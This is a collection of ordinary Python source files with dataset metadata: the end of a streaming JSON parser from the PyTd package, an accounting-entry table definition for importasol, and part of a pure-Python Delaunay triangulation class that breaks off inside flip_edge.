if event.node.parent is None or event.node.parent != ARRAY:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected array element but not in an array.")
if event.type == START_OBJECT:
if expectedType is not None and expectedType != OBJECT:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " +
expectedType + " but got an object instead.")
elif expectedType is None or readAll:
return self.readObject(event)
elif event.type == START_ARRAY:
if expectedType is not None and expectedType != ARRAY:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " +
expectedType + " but got array instead.")
if expectedType is None or readAll:
return self.readArray(event)
else:
return JSONArrayIterator(self)
else:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Unexpected event: " + str(event))
def readObject(self, event=None):
"""Read and return a JSON object."""
if event is None:
event = self.nextEvent()
popRequired = False
else:
popRequired = True
if event is None:
return None
if event.type != START_OBJECT:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_OBJECT but got " + event.type + " instead.")
obj = self._load(event)
if popRequired:
self._pop()
return obj
def readArray(self, event=None):
"""Read and return a JSON array."""
if event is None:
event = self.nextEvent()
popRequired = False
else:
popRequired = True
if event is None:
return None
if event.type != START_ARRAY:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_ARRAY but got " + event.type + " instead.")
arr = self._load(event)
if popRequired:
self._pop()
return arr
def nextEvent(self):
"""Iterator method, return next JSON event from the stream, raises
StopIteration() when complete."""
try:
return self.__next__()
except StopIteration:
return None
def next(self):
"""Iterator method, return next JSON event from the stream, raises
StopIteration() when complete."""
return self.__next__()
def __next__(self):
"""Iterator method, return next JSON event from the stream, raises
StopIteration() when complete."""
while True:
try:
token = self.tokens[self.tokenIndex]
self.tokenIndex += 1
if token == "" or token.isspace():
pass
elif token == '{':
return self._push(OBJECT)
elif token == '}':
if self.node.type == FIELD:
self.tokenIndex -= 1
event = self._pop()
if event is not None:
return event
elif self.node.type == OBJECT:
return self._pop()
else:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"A closing curly brace ('}') is only expected "
"at the end of an object.")
elif token == '[':
if self.node is not None and self.node.type == OBJECT:
raise JSONParseError(
JSON_SYNTAX_ERROR, "An array in an object must "
"be preceded by a field name.")
return self._push(ARRAY)
elif token == ']':
if self.valueType is not None:
self.tokenIndex -= 1
event = self._arrayValue()
if event is not None:
return event
elif self.node.type == ARRAY:
if self.node.lastIndex == self.node.arrayLength:
self.node.arrayLength += 1
return self._pop()
else:
raise JSONParseError(
JSON_SYNTAX_ERROR, "A closing bracket (']') "
"is only expected at the end of an array.")
elif token == ':':
if self.node.type == OBJECT:
if self.value != "" and self.valueType == STRING:
event = self._push(FIELD, self.value)
self.value = ""
self.valueType = None
return event
else:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"Name for name/value pairs cannot be empty.")
else:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"A colon (':') can only following a field "
"name within an object.")
elif token == ',':
if self.node.type == ARRAY:
event = self._arrayValue()
self.node.arrayLength += 1
elif self.node.type == FIELD:
event = self._pop()
else:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"A comma (',') is only expected between fields "
"in objects or elements of an array.")
if event is not None:
return event
else:
if self.valueType is not None:
raise JSONParseError(
JSON_SYNTAX_ERROR, "Extra name or value found "
"following: " + str(self.value))
elif self.node is None:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"Input must start with either an "
"OBJECT ('{') or ARRAY ('['), got '" + token +
"' instead.")
elif token == '"':
escape = False
while True:
try:
token = self.tokens[self.tokenIndex]
self.tokenIndex += 1
if token == "":
pass
elif escape:
escape = False
self.value += token
elif token == '"':
break
elif token == '\\':
escape = True
else:
self.value += token
except IndexError:
data = self.stream.read(
self.size).decode(self.encoding)
if data == "":
raise JSONParseError(
JSON_INCOMPLETE_ERROR,
"Reached end of input before " +
"reaching end of string.")
self.tokens = self.pattern.split(data)
self.tokenIndex = 0
self.valueType = STRING
else:
token = token.strip()
if self.tokenIndex == len(self.tokens):
self.halfToken = token
raise IndexError
elif token[0].isdigit() or token[0] == '-':
self.value = decimal.Decimal(token)
self.valueType = NUMBER
elif token == "null":
self.value = None
self.valueType = NULL
elif token == "true":
self.value = True
self.valueType = BOOLEAN
elif token == "false":
self.value = False
self.valueType = BOOLEAN
else:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"Unexpected token: " + token)
except IndexError:
data = self.stream.read(self.size).decode(self.encoding)
if data == "":
if self.node is not None:
raise JSONParseError(
JSON_INCOMPLETE_ERROR, "Reached end of input "
"before reaching end of JSON structures.")
else:
raise StopIteration()
return None
logger.trace(data)
self.tokens = self.pattern.split(data)
self.tokenIndex = 0
if self.halfToken is not None:
self.tokens[0] = self.halfToken + self.tokens[0]
self.halfToken = None
def _load(self, event):
if event.type == START_OBJECT:
value = start = "{"
end = "}"
elif event.type == START_ARRAY:
value = start = "["
end = "]"
else:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Unexpected event: " + event.type)
count = 1
tokens = self.tokens
tokenIndex = self.tokenIndex
inString = False
inEscape = False
try:
while True:
startIndex = tokenIndex
for token in tokens[startIndex:]:
tokenIndex += 1
if token == "":
pass
elif inString:
if inEscape:
inEscape = False
elif token == '"':
inString = False
elif token == '\\':
inEscape = True
elif token == '"':
inString = True
elif token == start:
count += 1
elif token == end:
count -= 1
if count == 0:
value += "".join(tokens[startIndex:tokenIndex])
raise StopIteration()
value += "".join(tokens[startIndex:])
data = self.stream.read(self.size).decode(self.encoding)
if data == "":
raise JSONParseError(
JSON_INCOMPLETE_ERROR, "Reached end of input before "
"reaching end of JSON structures.")
tokens = self.pattern.split(data)
tokenIndex = 0
except StopIteration:
pass
self.tokens = tokens
self.tokenIndex = tokenIndex
try:
return json.loads(value, parse_float=decimal.Decimal,
parse_int=decimal.Decimal)
except ValueError as e:
raise JSONParseError(JSON_SYNTAX_ERROR, "".join(e.args))
def _push(self, nodeType, value=None):
if self.node is not None and self.node.type == FIELD:
self.node.valueType = nodeType
self.node = JSONNode(self.node, nodeType, value)
if self.node.parent is not None and self.node.parent.type == ARRAY:
self.node.arrayIndex = self.node.parent.arrayLength
if self.node.parent.lastIndex == self.node.parent.arrayLength:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"Missing comma separating array elements.")
self.node.parent.lastIndex = self.node.parent.arrayLength
return self.node.startEvent()
def _pop(self):
# Pop the current node from the stack.
node = self.node
self.node = self.node.parent
# Set the value and value type on the node.
if node.valueType is None:
node.valueType = self.valueType
node.value = self.value
# Reset value and valueType
self.value = ""
self.valueType = None
if node.type == FIELD and node.valueType is None:
raise JSONParseError(
JSON_SYNTAX_ERROR, "Expected value for field: " + node.name)
# Return the end event for the node.
return node.endEvent()
def _arrayValue(self):
endOfArray = self.node.lastIndex == self.node.arrayLength
if self.valueType is None and endOfArray:
pass
elif self.valueType is None:
raise JSONParseError(
JSON_SYNTAX_ERROR,
"Expected value for array element at index: " +
str(self.node.arrayLength))
else:
event = JSONEvent(
self.node, ARRAY_VALUE, self.value, self.valueType,
self.node.arrayLength)
self.node.lastIndex = self.node.arrayLength
# Reset value and valueType
self.value = ""
self.valueType = None
# Return the end event for the node.
return event
def __iter__(self):
return self
# Define exceptions
class JSONParseError(Exception):
def __init__(self, code, msg):
self.args = (code, msg)
self.code = code
self.msg = msg
class JSONNode (object):
def __init__(self, parent, nodeType, name=None, value=None,
valueType=None):
self.parent = parent
self.type = nodeType
self.name = name
self.value = value
self.valueType = valueType
self.arrayIndex = None
self.arrayLength = None
self.lastIndex = -1
if nodeType == ARRAY:
self.arrayLength = 0
def startEvent(self):
if self.type == ARRAY:
return JSONEvent(self, START_ARRAY, arrayIndex=self.arrayIndex)
elif self.type == OBJECT:
return JSONEvent(self, START_OBJECT, arrayIndex=self.arrayIndex)
elif self.type == FIELD:
return JSONEvent(self, FIELD_NAME, self.name)
def endEvent(self):
if self.type == ARRAY:
return JSONEvent(self, END_ARRAY, arrayIndex=self.arrayIndex,
arrayLength=self.arrayLength)
elif self.type == OBJECT:
return JSONEvent(self, END_OBJECT, arrayIndex=self.arrayIndex)
elif self.type == FIELD and self.valueType not in (OBJECT, ARRAY):
return JSONEvent(self, FIELD_VALUE, self.value, self.valueType)
class JSONEvent (object):
def __init__(self, node, eventType, value=None, valueType=None,
arrayIndex=None, arrayLength=None):
self.node = node
self.type = eventType
self.value = value
self.valueType = valueType
self.arrayIndex = arrayIndex
self.arrayLength = arrayLength
def __repr__(self):
text = "JSONEvent (type=" + self.type
if self.value is not None:
text += ", value=" + str(self.value)
if self.valueType is not None:
text += ", valueType=" + str(self.valueType)
if self.arrayIndex is not None:
text += ", arrayIndex=" + str(self.arrayIndex)
if self.arrayLength is not None:
text += ", arrayLength=" + str(self.arrayLength)
text += ")"
return text
class JSONArrayIterator (object):
def __init__(self, parser):
self.parser = parser
self.complete = False
def __iter__(self):
return self
def __next__(self):
if self.complete:
raise StopIteration()
else:
event = self.parser.nextEvent()
if event.type == START_OBJECT:
return self.parser.readObject(event)
elif event.type == START_ARRAY:
return self.parser.readArray(event)
elif event.type == ARRAY_VALUE:
return event.value
elif event.type == END_ARRAY:
self.complete = True
raise StopIteration()
else:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Unexpected event: " + str(event))
def next(self):
return self.__next__()
| {
"repo_name": "fxstein/PyTd",
"path": "teradata/pulljson.py",
"copies": "1",
"size": "22715",
"license": "mit",
"hash": -3771223324759636000,
"line_mean": 39.1325088339,
"line_max": 79,
"alpha_frac": 0.4960598723,
"autogenerated": false,
"ratio": 5.025442477876106,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6021502350176106,
"avg_score": null,
"num_lines": null
} |
""" apu.py Tabla APU y Asiento. """
from decimal import Decimal
from ..base import SOLFile
from ..fields import CampoA, CampoT, CampoN, CampoF, CampoND, CampoV
from ..fields import CampoCuenta, CampoDebeHaber
def get_en_pesetas(obj, col_valor):
val = getattr(obj, col_valor)
return val * Decimal('166.386')
class APU(SOLFile):
cA = CampoN("Diario", size=3, default=1, required=True)
cB = CampoF("Fecha", required=True)
cC = CampoN("Asiento", size=5, default=0, required=True)
cD = CampoN("Orden", size=6, required=True)
cE = CampoCuenta("Cuenta", size=10, required=True)
cF = CampoV("Pesetas", size=15, getter=get_en_pesetas,
parametros=('euros'))
cG = CampoA("Concepto", size=60)
cH = CampoA("Documento", size=5)
cI = CampoND("Debe", size=15)
cJ = CampoND("Haber", size=15)
cK = CampoA("Moneda", size=1, default='E')
cL = CampoN("Punteo", size=1, default=0)
cM = CampoA("Tipo IVA", size=1)
cN = CampoN("Codigo de IVA", size=5)
cO = CampoN("Departamento", size=3)
cP = CampoN("Subdepartamento", size=3)
cQ = CampoT("Ruta Imagen")
euros = CampoDebeHaber("Euros", 'I', 'J', editable=True)
asi = None
class Meta:
tabla = 'APU'
aliases = (('dpto', 'O'), ('subdpto', 'P'))
sort_by = ('fecha', 'asiento', 'orden')
def __unicode__(self):
con = self.concepto and self.concepto[:40] or None
return u"APU(%s %s,%s: %s:%10s %s > %s)" % \
(self.fecha.strftime('%Y-%m-%d'),
self.diario, self.asiento, self.orden,
self.cuenta, self.euros, con)
__str__ = __unicode__
__repr__ = __unicode__
| {
"repo_name": "telenieko/importasol",
"path": "importasol/db/contasol/apu.py",
"copies": "1",
"size": "1686",
"license": "bsd-3-clause",
"hash": -1478644694118990000,
"line_mean": 33.4081632653,
"line_max": 68,
"alpha_frac": 0.5871886121,
"autogenerated": false,
"ratio": 2.6302652106084246,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8717453822708424,
"avg_score": 0,
"num_lines": 49
} |
# A pure-python, exact delaunay triangulation.
# uses robust_predicates for in-circle tests, follows
# the algorithm of CGAL to the extent possible.
import logging
import pdb
logger = logging.getLogger()
import six
import numpy as np
import matplotlib.pyplot as plt
# do these work in py2?
from ..spatial import robust_predicates
from . import unstructured_grid
from ..utils import (circular_pairs, dist, point_segment_distance, set_keywords,
segment_segment_intersection)
if six.PY3:
def cmp(a,b):
return bool(a>b)-bool(a<b)
try:
from scipy import spatial
except ImportError:
spatial=None
class DuplicateNode(Exception):
pass
class BadConstraint(Exception):
def __init__(self,*a,**k):
super(BadConstraint,self).__init__(*a)
set_keywords(self,k)
class IntersectingConstraints(BadConstraint):
edge=None
class DuplicateConstraint(BadConstraint):
nodes=None
class ConstraintCollinearNode(IntersectingConstraints):
"""
Special case of intersections, when a constraint attempts to
run *through* an existing node
"""
node=None
def ordered(x1,x2,x3):
"""
given collinear points, return true if they are in order
along that line
"""
if x1[0]!=x2[0]:
i=0
else:
i=1
return (x1[i]<x2[i]) == (x2[i]<x3[i])
def rel_ordered(x1,x2,x3,x4):
"""
given 4 collinear points, return true if the direction
from x1->x2 is the same as x3=>x4
requires x1!=x2, and x3!=x4
"""
if x1[0]!=x2[0]:
i=0 # choose a coordinate which is varying
else:
i=1
assert x1[i]!=x2[i]
assert x3[i]!=x4[i]
return (x1[i]<x2[i]) == (x3[i]<x4[i])
class Triangulation(unstructured_grid.UnstructuredGrid):
"""
Mimics the Triangulation_2 class of CGAL.
note that we make some additional assumptions on invariants -
nodes, cells and edges are ordered in a consistent way:
"""
INF_NODE=-666
INF_CELL=unstructured_grid.UnstructuredGrid.UNMESHED
max_sides=3
# local exception types
DuplicateNode=DuplicateNode
IntersectingConstraints=IntersectingConstraints
BadConstraint=BadConstraint
ConstraintCollinearNode=ConstraintCollinearNode
post_check=False # enables [expensive] checks after operations
edge_dtype=(unstructured_grid.UnstructuredGrid.edge_dtype +
[ ('constrained',np.bool8) ] )
def add_node(self,**kwargs):
# will eventually need some caching or indexing to make
# the locate faster. locate() happens first so that
# the mesh complies with invariants and doesn't have a dangling
# node
loc=self.locate(kwargs['x'])
n=super(Triangulation,self).add_node(**kwargs)
self.tri_insert(n,loc)
return n
def modify_node(self,n,_brute_force=False,**kwargs):
"""
_brute_force: if True, move node by delete/add, rather than trying
a short cut.
"""
if 'x' not in kwargs:
return super(Triangulation,self).modify_node(n,**kwargs)
old_rec=self.nodes[n]
# Brute force, removing and re-adding, is no good as the
# constraints are lost.
# A slightly more refined, but still brutish, approach, is to save
# the constraints, delete, add, add constraints.
# be sped up
# handle a common case where the node is only moved a small
# distance, such that we only have to do a small amount of
# work to fix up the triangulation
# if the new location is inside a cell adjacent to n, then
# we can [probably?] move the node
if self.dim()<2:
# the short cuts are only written for the 2D case.
_brute_force=True
if not _brute_force:
# check whether new node location is on the "right" side
# of all existing "opposite" edges (the edge of each cell
# which doesn't contain n.
shortcut=True
if shortcut:
my_cells=self.node_to_cells(n)
for c in my_cells:
c_nodes=self.cells['nodes'][c]
c_xy=self.nodes['x'][c_nodes]
pnts=[]
for i,c_node in enumerate(c_nodes):
if c_node==n:
pnts.append(kwargs['x'])
else:
pnts.append(c_xy[i])
if robust_predicates.orientation(*pnts) <=0:
shortcut=False
if shortcut:
# also check for this node being on the convex hull
# find the pair of edges, if they exist, which have
# n, and have the infinite cell to the left.
he_rev=he_fwd=None
for j in self.node_to_edges(n):
if self.edges['cells'][j,1]==self.INF_CELL:
he=self.halfedge(j,1)
elif self.edges['cells'][j,0]==self.INF_CELL:
he=self.halfedge(j,0)
else:
continue
if he.node_fwd()==n:
he_rev=he
elif he.node_rev()==n:
he_fwd=he
else:
assert False
# can't have just one.
assert (he_rev is None) == (he_fwd is None)
if he_rev is not None:
# need to check that the movement of this node does
# not invalidate the orientation with respect to
# neighboring edges of the convex hull.
# get the five consecutive points, where c is the
# node being moved. make sure that a-b-c and c-d-e
# are properly oriented
cons_idxs=[he_rev.rev().node_rev(),
he_rev.node_rev(),
n,
he_fwd.node_fwd(),
he_fwd.fwd().node_fwd()]
abcde=self.nodes['x'][cons_idxs]
abcde[2]=kwargs['x']
if robust_predicates.orientation(*abcde[:3])>0:
shortcut=False
elif robust_predicates.orientation(*abcde[2:])>0:
shortcut=False
elif robust_predicates.orientation(*abcde[1:4])>0:
shortcut=False
if shortcut:
# short cut should work:
retval=super(Triangulation,self).modify_node(n,**kwargs)
self.restore_delaunay(n)
# when refining the above tests, uncomment this to increase
# the amount of validation
# if self.check_convex_hull():
# pdb.set_trace()
return retval
# but adding the constraints back can fail, in which case we should
# roll back our state, and fire an exception.
constraints_to_replace=[]
for j in self.node_to_edges(n):
if self.edges['constrained'][j]:
constraints_to_replace.append( self.edges['nodes'][j].copy() )
old_x=self.nodes['x'][n].copy() # in case of rollback
self.delete_node(n)
for fld in old_rec.dtype.names:
if fld not in ['x','deleted'] and fld not in kwargs:
kwargs[fld]=old_rec[fld]
new_n=self.add_node(_index=n,**kwargs)
try:
for n1,n2 in constraints_to_replace:
self.add_constraint(n1,n2) # This can fail!
except self.IntersectingConstraints as exc:
self.log.warning("modify_node: intersecting constraints - rolling back")
self.delete_node(n)
kwargs['x']=old_x # move it back to where it started
new_n=self.add_node(_index=n,**kwargs)
for n1,n2 in constraints_to_replace:
self.add_constraint(n1,n2) # This should not fail
# but signal to the caller that the modify failed
raise
assert new_n==n
def add_edge(self,**kw):
""" add-on: cells default to INF_CELL, not -1.
"""
j=super(Triangulation,self).add_edge(**kw)
if 'cells' not in kw:
self.edges[j]['cells'][:]=self.INF_CELL
return j
def choose_start_cell(self,t=None):
""" choose a starting cell for trying to locate where a new vertex
should go. May return INF_CELL if there are no valid cells.
t: can specify a target point which may be used with a spatial index
to speed up the query.
"""
c=0
try:
while self.cells['deleted'][c]:
c+=1
return c
except IndexError:
return self.INF_CELL
IN_VERTEX=0
IN_EDGE=2
IN_FACE=3
OUTSIDE_CONVEX_HULL=4
OUTSIDE_AFFINE_HULL=5
def dim(self):
if len(self.cells) and not np.all(self.cells['deleted']):
return 2
elif len(self.edges) and not np.all(self.edges['deleted']):
return 1
elif len(self.nodes) and not np.all(self.nodes['deleted']):
return 0
else:
return -1
def angle_sort_adjacent_nodes(self,n,ref_nbr=None,topo=True):
if topo:
return self.topo_sort_adjacent_nodes(n,ref_nbr)
else:
return super(Triangulation,self).angle_sort_adjacent_ndoes(n,ref_nbr=ref_nbr)
def topo_sort_adjacent_nodes(self,n,ref_nbr=None):
""" like angle_sort_adjacent_nodes, but relying on topology, not geometry.
"""
nbrs=list(self.node_to_nodes(n))
if len(nbrs)<3:
snbrs=nbrs
else:
he_nbrs = [ self.nodes_to_halfedge(n,nbr)
for nbr in nbrs ]
map_next={}
for he in he_nbrs:
# this doesn't use angle_sort
c=he.cell_opp()
map_next[c] = (he.node_fwd(),he.cell())
trav0=trav=c
snbrs=[]
while 1:
#if len(snbrs)>20: # DBG
# pdb.set_trace()
node,cell = map_next[trav]
snbrs.append(node)
trav=cell
if trav==trav0:
break
if ref_nbr is not None:
i=list(snbrs).index(ref_nbr)
snbrs=np.roll(snbrs,-i)
return snbrs
def locate(self,t,c=None):
""" t: [x,y] point to locate
c: starting cell, if known
return loc=[face,loc_type,loc_index]
face: INF_CELL if t is not on or inside a finite cell
loc_type:
OUTSIDE_AFFINE_HULL: adding this vertex will increase the dimension of the triangulation.
empty triangulation: dim=-1
single vertex: dim=0
collinear edges: dim=1
faces: dim=2
loc_index set to current dimensionality
OUTSIDE_CONVEX_HULL: dimensionality may still be 1 or 2.
if the dimension is 1, then loc_index gives the nearest node
if the dimension is 2, then loc_index gives an adjacent half-edge
IN_VERTEX: t coincides with existing vertex,
if face is finite, then it's a cell containing the vertex, and loc_index
is the index of that vertex in the cell.
if face is INF_CELL, implies dimension<2, and loc_index gives existing node
IN_EDGE: t is collinear with existing edge.
if face is finite, it is a cell containing the edge.
loc_index is the index of the edge itself.
face may be INF_CELL, which implies dimension<2
IN_FACE: t is in the interior of a face. face is the containing cell. loc_index
is not used.
"""
c=c or self.choose_start_cell(t)
prev=None # previous face
# To identify the right orientation of the half-edge, remember
# the ordering of the nodes -- this is CCW ordering from the
# perspective of prev
last_nodes=None
last_edge=None # the edge between c and prev
# Checks for affine hull -
# 3rd element gives the current dimensionality of the affine hull
if self.Nnodes_valid()==0:
return (self.INF_CELL,self.OUTSIDE_AFFINE_HULL,-1)
elif self.Nedges_valid()==0:
return (self.INF_CELL,self.OUTSIDE_AFFINE_HULL,0)
elif self.Ncells_valid()==0:
return self.locate_1d(t,c)
while True:
if c==self.INF_CELL:
# // c must contain t in its interior
# lt = OUTSIDE_CONVEX_HULL;
# li = c->index(infinite_vertex());
# Changed to give adjacent edge, rather than
# confusing loc_index=4
# loc=(self.INF_CELL,self.OUTSIDE_CONVEX_HULL,last_edge)
# changed again, to give a half-edge
# flip the order because they were in the order with respect
# to the prev face, but now we jumped over last_edge
he=self.nodes_to_halfedge( last_nodes[1],last_nodes[0] )
loc=(self.INF_CELL,self.OUTSIDE_CONVEX_HULL,he)
return loc
p0=self.nodes['x'][self.cells['nodes'][c,0]]
p1=self.nodes['x'][self.cells['nodes'][c,1]]
p2=self.nodes['x'][self.cells['nodes'][c,2]]
prev = c
# Orientation o0, o1, o2;
# nodes are stored in CCW order for the cell.
# 1st edge connects first two nodes
# neighboring cells follow the edges
o0 = robust_predicates.orientation(p0,p1,t)
if o0 == -1: # CW
last_edge=self.cell_to_edges(c)[0]
last_nodes=self.cells['nodes'][c,[0,1]]
c=self.cell_to_cells(c)[0]
continue
o1 = robust_predicates.orientation(p1,p2,t)
if o1 == -1:
last_edge=self.cell_to_edges(c)[1]
last_nodes=self.cells['nodes'][c,[1,2]]
c=self.cell_to_cells(c)[1]
continue
o2 = robust_predicates.orientation(p2,p0,t)
if o2 == -1:
last_edge=self.cell_to_edges(c)[2]
last_nodes=self.cells['nodes'][c,[2,0]]
c=self.cell_to_cells(c)[2]
continue
# must be in or on a face --
break
# For simplicity, I'm skipping some optimizations which avoid re-checking
# the previous edge. see Triangulation_2.h:2616
# now t is in c or on its boundary
o_sum=(o0==0)+(o1==0)+(o2==0)
if o_sum==0:
loc=(c,self.IN_FACE,4)
elif o_sum==1:
if o0==0:
j=0
elif o1==0:
j=1
else:
j=2
# better to consistently return the edge index here, not
# just its index in the cell
loc=(c,self.IN_EDGE,self.cells['edges'][c,j])
elif o_sum==2:
if o0!=0:
loc=(c,self.IN_VERTEX,2)
elif o1!=0:
loc=(c,self.IN_VERTEX,0)
else:
loc=(c,self.IN_VERTEX,1)
else:
assert False
return loc
def locate_1d(self,t,c):
# There are some edges, and t may fall within an edge, off the end,
# or off to the side.
j=six.next(self.valid_edge_iter())
p0=self.nodes['x'][ self.edges['nodes'][j,0] ]
p1=self.nodes['x'][ self.edges['nodes'][j,1] ]
o=robust_predicates.orientation(p0,p1,t)
if o!=0:
return (self.INF_CELL,self.OUTSIDE_AFFINE_HULL,1)
# t is collinear - need to find out whether it's in an edge
# or not
# choose a coordinate which varies along the line
if p0[0]!=p1[0]:
coord=0
else:
coord=1
if (t[coord]<p0[coord]) != (t[coord]<p1[coord]):
return (self.INF_CELL,self.IN_EDGE,j)
# do we need to go towards increasing or decreasing coord?
if (t[coord]<p0[coord]) and (t[coord]<p1[coord]):
direc=-1
else:
direc=1
while True:
# j indexes the edge we just tested.
# p0 and p1 are the endpoints of the edge
# 1. do we want a neighbor of n0 or n1?
if direc*cmp(p0[coord],p1[coord]) < 0: # want to go towards p1
n_adj=self.edges['nodes'][j,1]
else:
n_adj=self.edges['nodes'][j,0]
for jnext in self.node_to_edges(n_adj):
if jnext!=j:
j=jnext
break
else:
# walked off the end of the line -
# n_adj is the nearest to us
return (self.INF_CELL,self.OUTSIDE_CONVEX_HULL,n_adj)
p0=self.nodes['x'][ self.edges['nodes'][j,0] ]
p1=self.nodes['x'][ self.edges['nodes'][j,1] ]
if (t[coord]<p0[coord]) != (t[coord]<p1[coord]):
return (self.INF_CELL,self.IN_EDGE,j)
def tri_insert(self,n,loc):
# n: index for newly inserted node.
# note that loc must already be computed -
# types of inserts:
# on an edge, inside a face, outside the convex hull
# outside affine hull
loc_c,loc_type,loc_idx = loc
if loc_type==self.IN_FACE:
self.tri_insert_in_face(n,loc)
elif loc_type==self.IN_EDGE:
self.tri_insert_in_edge(n,loc)
elif loc_type==self.IN_VERTEX:
raise DuplicateNode()
elif loc_type==self.OUTSIDE_CONVEX_HULL:
self.tri_insert_outside_convex_hull(n,loc)
elif loc_type==self.OUTSIDE_AFFINE_HULL:
self.tri_insert_outside_affine_hull(n,loc)
# for some of those actions, this could be skipped
self.restore_delaunay(n)
def tri_insert_in_face(self,n,loc):
loc_f,loc_type,_ = loc
a,b,c=self.cells['nodes'][loc_f]
self.delete_cell(loc_f)
self.add_edge(nodes=[n,a])
self.add_edge(nodes=[n,b])
self.add_edge(nodes=[n,c])
self.add_cell(nodes=[n,a,b])
self.add_cell(nodes=[n,b,c])
self.add_cell(nodes=[n,c,a])
def tri_insert_in_edge(self,n,loc):
""" Takes care of splitting the edge and any adjacent cells
"""
loc_f,loc_type,loc_edge = loc
self.log.debug("Loc puts new vertex in edge %s"%loc_edge)
cells_to_split=[]
for c in self.edge_to_cells(loc_edge):
if c<0: continue
cells_to_split.append( self.cells[c].copy() )
self.log.debug("Deleting cell on insert %d"%c)
self.delete_cell(c)
# Modify the edge:
a,c=self.edges['nodes'][loc_edge]
b=n
self.delete_edge(loc_edge)
self.add_edge(nodes=[a,b])
self.add_edge(nodes=[b,c])
for cell_data in cells_to_split:
common=[n for n in cell_data['nodes']
if n!=a and n!=c][0]
jnew=self.add_edge(nodes=[b,common])
for replace in [a,c]:
nodes=list(cell_data['nodes'])
idx=nodes.index(replace)
nodes[idx]=b
self.add_cell(nodes=nodes)
def tri_insert_outside_convex_hull(self,n,loc):
dim=self.dim()
if dim==2:
self.tri_insert_outside_convex_hull_2d(n,loc)
elif dim==1:
self.tri_insert_outside_convex_hull_1d(n,loc)
else:
assert False
def tri_insert_outside_convex_hull_1d(self,n,loc):
self.log.debug("tri_insert_outside_convex_hull_1d")
n_adj=loc[2]
self.add_edge(nodes=[n,n_adj])
def tri_insert_outside_convex_hull_2d(self,n,loc):
# HERE:
# the CGAL code is a little funky because of the use of
# infinite vertices and the like.
# the plan here:
# a. change 'locate' to return halfedges instead of just an
# edge. otherwise we'd have to redo the orientation check here.
# b. traverse the half-edge forwards and backwards, accumulating
# lists of adjacent edges which also satisfy the CCW rule.
# c. create triangles with n and the given half-edge, as well as the
# accumulated adjacent edges
# the result then is that the convex hull is built out.
# Triangulation_2.h:1132
assert loc[0]==self.INF_CELL # sanity.
he0=loc[2] # adjacent half-edge
def check_halfedge(he):
nodes=[he.node_rev(),he.node_fwd(),n]
pnts=self.nodes['x'][nodes]
ccw=robust_predicates.orientation(pnts[0],pnts[1],pnts[2])
return ccw>0
assert check_halfedge(he0)
addl_fwd=[]
he=he0.fwd()
while check_halfedge(he):
addl_fwd.append(he)
he=he.fwd()
addl_rev=[]
he=he0.rev()
while check_halfedge(he):
addl_rev.append(he)
he=he.rev()
self.add_edge( nodes=[he0.node_rev(),n] )
self.add_edge( nodes=[he0.node_fwd(),n] )
self.add_cell( nodes=[he0.node_rev(),he0.node_fwd(),n] )
for he in addl_fwd:
self.add_edge( nodes=[he.node_fwd(),n] )
# the second node *had* been ne0.node_fwd(), but that
# was probably a typo.
self.add_cell( nodes=[he.node_rev(),he.node_fwd(),n] )
for he in addl_rev:
self.add_edge( nodes=[he.node_rev(),n] )
# same here.
self.add_cell( nodes=[he.node_rev(),he.node_fwd(),n] )
# 1. Check orientation. Since we get an unoriented edge j_adj,
# all we can do is assert that the points are not collinear.
# 2. loops through faces incident to infinite vertex (?)
# gathering a list of external edges which make a CCW triangle
# with the vertex to insert. stop on the first edge which fails this.
# This is done first traversing CCW, then again traversing CW
# 3. Make the new face with the given edge..
#
def tri_insert_outside_affine_hull(self,n,loc):
self.log.debug("Insert outside affine hull")
loc_face,loc_type,curr_dim = loc
if curr_dim==-1:
self.log.debug(" no nodes, no work")
elif curr_dim==0:
self.log.debug(" simply add edge")
for nbr in self.valid_node_iter():
if nbr != n:
self.add_edge(nodes=[n,nbr])
elif curr_dim==1:
self.log.debug(" add edges and cells")
# the strategy in Triangulation_2.h makes some confusing
# use of the infinite face - take a less elegant, more explicit
# approach here
orig_edges=list(self.valid_edge_iter())
for nbr in self.valid_node_iter():
if nbr != n:
self.add_edge(nodes=[n,nbr])
for j in orig_edges:
n1,n2=self.edges['nodes'][j]
self.add_cell( nodes=[n,n1,n2] )
else:
assert False
def add_cell(self,_force_invariants=True,**kwargs):
if _force_invariants:
nodes=kwargs['nodes']
# Make sure that topological invariants are maintained:
# nodes are ordered ccw.
# edges are populated
# used to assume/force the edges to be sequenced opposite nodes.
# but that is a triangulation-specific assumption, while we're using
# a general unstructured_grid base class. The base class makes
# an incompatible assumption, that the first edge connects the first
# two nodes.
pnts=self.nodes['x'][nodes]
ccw=robust_predicates.orientation(pnts[0],pnts[1],pnts[2])
assert ccw!=0
if ccw<0:
nodes=nodes[::-1]
kwargs['nodes']=nodes
j0=self.nodes_to_edge(nodes[0],nodes[1])
j1=self.nodes_to_edge(nodes[1],nodes[2])
j2=self.nodes_to_edge(nodes[2],nodes[0])
kwargs['edges']=[j0,j1,j2]
c=super(Triangulation,self).add_cell(**kwargs)
# update the link from edges back to cells
for ji,j in enumerate(self.cells['edges'][c]):
# used to attempt to enforce this:
# ji-th edge is the (ji+1)%3,(ji+2)%3 nodes of the cell
# but that's not compatible with checks in unstructured_grid
# but need to know if the edge is in that order or the
# opposite
if self.edges['nodes'][j,0] == self.cells['nodes'][c,ji]:
self.edges['cells'][j,0] = c
else:
self.edges['cells'][j,1] = c
return c
def flip_edge(self,j):
"""
rotate the given edge CCW. requires that triangular cells
exist on both sides of the edge
